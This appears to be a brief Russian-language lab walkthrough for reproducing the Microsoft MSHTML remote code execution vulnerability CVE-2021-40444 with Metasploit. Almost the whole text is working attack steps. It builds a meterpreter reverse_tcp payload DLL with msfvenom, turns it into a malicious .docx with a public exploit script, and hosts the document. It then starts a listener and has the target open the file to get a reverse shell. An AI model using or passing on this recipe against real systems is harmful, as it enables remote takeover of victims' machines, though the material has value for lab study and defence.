
Попытка воспроизвести уязвимость удаленного выполнения кода (RCE) Microsoft MSHTML с использованием Metasploit Framework.
Попытка воспроизвести уязвимость удаленного выполнения кода (RCE) Microsoft MSHTML с использованием Metasploit Framework.
работает лучше всего, если не запускать в FlareVM
Клонируйте репозиторий из https://github.com/lockedbyte/CVE-2021-40444
Подготовьте .dll шаблон для последующего использования с msfvenom
msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll
Скопируйте созданный template.dll в папку test/ из репозитория
Дайте права на выполнение template.dll с помощью chmod +x template.dll
Запустите скрипт, чтобы обработать в
template.dlloutputpython3 exploit.py generate ~/test/template.dll http://<SOURCE IP>Документ будет экспортирован в папку out/, и мы можем настроить прослушиватель на нашем HTTP-порту (по умолчанию 80)
python3 exploit.py host 80
Запустите metasploit с помощью
msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost <SOURCE IP>
run
Затем мы можем отправить document.docx на нашу уязвимую машину и выполнить .docx
Мы получим ответ в терминале exploit.py, и лабораторная работа будет успешной, если нам удастся запустить обратную TCP-оболочку.